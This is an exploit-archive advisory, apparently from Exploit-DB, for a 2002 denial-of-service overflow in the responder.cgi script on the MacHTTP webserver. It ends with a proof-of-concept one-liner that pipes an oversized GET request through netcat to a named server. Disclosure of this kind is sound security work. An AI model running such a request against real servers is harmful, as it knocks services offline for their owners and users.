Denial of Service in responder.cgi

vendor:

responder.cgi

by:

SecurityFocus

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: responder.cgi

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: MacOS

2002

Denial of Service in responder.cgi

It is possible to cause a denial of service to MacHTTP webserver due to improper bounds checking in the script 'responder.cgi'. HTTP GET requests with an excessive number of characters will cause the server to freeze.

Mitigation:

Restart the webserver to regain normal functionality.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/3155/info

responder.cgi' is a free CGI shell script, written in C, for MacHTTP Server and other MacOS webserver products.

It is possible to cause a denial of service to MacHTTP webserver due to improper bounds checking in the script 'responder.cgi'. HTTP GET requests with an excessive number of characters will cause the server to freeze.

The webserver will need to be restarted to regain normal functionality. 

$ echo "GET
/cgi-bin/responder.cgi?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" | nc
machttp-server.com 80